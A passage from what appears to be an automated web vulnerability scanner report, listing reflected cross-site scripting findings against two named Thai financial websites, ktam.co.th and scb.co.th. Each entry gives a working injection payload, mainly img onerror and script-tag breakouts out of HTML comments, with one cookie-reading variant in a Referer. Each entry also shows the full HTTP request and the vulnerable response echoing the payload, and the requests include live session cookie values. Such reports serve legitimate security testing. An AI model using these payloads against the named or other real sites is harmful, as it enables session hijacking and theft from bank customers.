Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29519

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/news.phpf5a99\"><img src=a onerror=alert(1)>0012edab763" title="THAI">
...[SNIP]...

5.135. http://www.ktam.co.th/en/index.php/news.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/news.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e79"><img%20src%3da%20onerror%3dalert(1)>d62e7af8df0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 44e79\"><img src=a onerror=alert(1)>d62e7af8df0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/news.php/44e79"><img%20src%3da%20onerror%3dalert(1)>d62e7af8df0 HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:52 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29511

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/44e79\"><img src=a onerror=alert(1)>d62e7af8df0" title="THAI">
...[SNIP]...

5.136. http://www.ktam.co.th/en/index.php/self_discovery.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/self_discovery.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47831"><img%20src%3da%20onerror%3dalert(1)>8021380eea4 was submitted in the REST URL parameter 3. This input was echoed as 47831\"><img src=a onerror=alert(1)>8021380eea4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/self_discovery.php47831"><img%20src%3da%20onerror%3dalert(1)>8021380eea4 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eaf4f8f44d0f
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:43:52 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29531

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/self_discovery.php47831\"><img src=a onerror=alert(1)>8021380eea4" title="THAI">
...[SNIP]...

5.137. http://www.ktam.co.th/en/index.php/self_discovery.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/self_discovery.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aef9"><img%20src%3da%20onerror%3dalert(1)>64ef3172b91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5aef9\"><img src=a onerror=alert(1)>64ef3172b91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/self_discovery.php/5aef9"><img%20src%3da%20onerror%3dalert(1)>64ef3172b91 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eaf4f8f44d0f
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:43:37 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29513

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/5aef9\"><img src=a onerror=alert(1)>64ef3172b91" title="THAI">
...[SNIP]...

5.138. http://www.ktam.co.th/en/index.php/style/news.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/style/news.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b8a3"><img%20src%3da%20onerror%3dalert(1)>d45478a1f97 was submitted in the REST URL parameter 4. This input was echoed as 9b8a3\"><img src=a onerror=alert(1)>d45478a1f97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/style/news.php9b8a3"><img%20src%3da%20onerror%3dalert(1)>d45478a1f97 HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:51 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29519

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/news.php9b8a3\"><img src=a onerror=alert(1)>d45478a1f97" title="THAI">
...[SNIP]...

5.139. http://www.ktam.co.th/en/index.php/style/news.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/style/news.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5033b"><img%20src%3da%20onerror%3dalert(1)>adcf6bb96be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5033b\"><img src=a onerror=alert(1)>adcf6bb96be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/style/news.php/5033b"><img%20src%3da%20onerror%3dalert(1)>adcf6bb96be HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:56 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29511

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/5033b\"><img src=a onerror=alert(1)>adcf6bb96be" title="THAI">
...[SNIP]...

5.140. http://www.ktam.co.th/en/index.php/style/page.txt [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/style/page.txt

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5cb8"><img%20src%3da%20onerror%3dalert(1)>a6dc4d6ba07 was submitted in the REST URL parameter 4. This input was echoed as a5cb8\"><img src=a onerror=alert(1)>a6dc4d6ba07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/style/page.txta5cb8"><img%20src%3da%20onerror%3dalert(1)>a6dc4d6ba07 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:49 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29521

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/page.txta5cb8\"><img src=a onerror=alert(1)>a6dc4d6ba07" title="THAI">
...[SNIP]...

5.141. http://www.scb.co.th/en/home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 82e77--><script>alert(1)</script>7483192efc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en82e77--><script>alert(1)</script>7483192efc4/home HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Siam+Commercial+Bank
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:31:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=7aiuv041g829i4m2vauvbc4c16; path=/
Expires: Wed, 03 Nov 2010 12:31:05 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 699

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en82e77--><script>alert(1)</script>7483192efc4/home -->
...[SNIP]...

5.142. http://www.scb.co.th/en/home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 71bd6--><script>alert(1)</script>bfc82f87338 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/home71bd6--><script>alert(1)</script>bfc82f87338 HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Siam+Commercial+Bank
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:31:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=16lur0dnjbg6ckb0jc7r7ejhv4; path=/
Expires: Wed, 03 Nov 2010 12:31:07 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 699

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en/home71bd6--><script>alert(1)</script>bfc82f87338 -->
...[SNIP]...

5.143. http://www.scb.co.th/en/home/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 17b7c--><script>alert(1)</script>59c19846c77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en17b7c--><script>alert(1)</script>59c19846c77/home/ HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/landing.html

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:33:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=l8d5qul39rmdtct59c0ei8em56; path=/
Expires: Wed, 03 Nov 2010 12:33:54 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 700

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en17b7c--><script>alert(1)</script>59c19846c77/home/ -->
...[SNIP]...

5.144. http://www.scb.co.th/en/home/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload a128d--><script>alert(1)</script>4d85dcd8997 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/homea128d--><script>alert(1)</script>4d85dcd8997/ HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/landing.html

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:33:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=sm7i78e3e90dv9b6vjcpqjmdg5; path=/
Expires: Wed, 03 Nov 2010 12:33:56 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 700

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en/homea128d--><script>alert(1)</script>4d85dcd8997/ -->
...[SNIP]...

5.145. http://www.scb.co.th/en/home/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 8a509--><script>alert(1)</script>b411353eb84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en8a509--><script>alert(1)</script>b411353eb84/home/favicon.ico HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=ms381nomj10vb6ipcub0ta3jg4

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:33:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:33:53 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 711

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en8a509--><script>alert(1)</script>b411353eb84/home/favicon.ico -->
...[SNIP]...

5.146. http://www.scb.co.th/en/home/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload df8b4--><script>alert(1)</script>19e5b79ab6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/homedf8b4--><script>alert(1)</script>19e5b79ab6d/favicon.ico HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=ms381nomj10vb6ipcub0ta3jg4

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:33:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:33:55 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 711

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en/homedf8b4--><script>alert(1)</script>19e5b79ab6d/favicon.ico -->
...[SNIP]...

5.147. http://www.scb.co.th/en/home/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload f12c1--><script>alert(1)</script>d4304ced27a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/home/favicon.icof12c1--><script>alert(1)</script>d4304ced27a HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=ms381nomj10vb6ipcub0ta3jg4

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:33:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:33:57 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 711

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en/home/favicon.icof12c1--><script>alert(1)</script>d4304ced27a -->
...[SNIP]...

5.148. http://www.scb.co.th/en/home/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1eab2--><script>alert(1)</script>41a3f37f580 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/home/favicon.ico?1eab2--><script>alert(1)</script>41a3f37f580=1 HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=ms381nomj10vb6ipcub0ta3jg4

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:33:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:33:51 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 714

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/en/home/favicon.ico?1eab2--><script>alert(1)</script>41a3f37f580=1 -->
...[SNIP]...

5.149. http://www.scb.co.th/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b81fb--><script>alert(1)</script>508f782dd38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.icob81fb--><script>alert(1)</script>508f782dd38 HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=pheig1kjk8ik69qvdja76e1mm0; _cbclose=1; _cbclose8098=1; _uid8098=5CC397F4.1; _ctout8098=1; __utmz=37298082.1304443497.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Siam%20Commercial%20Bank; __utma=37298082.1832332674.1304443497.1304443497.1304443497.1; __utmc=37298082; __utmb=37298082.1.10.1304443497

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:23:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:23:40 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 703

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/favicon.icob81fb--><script>alert(1)</script>508f782dd38 -->
...[SNIP]...

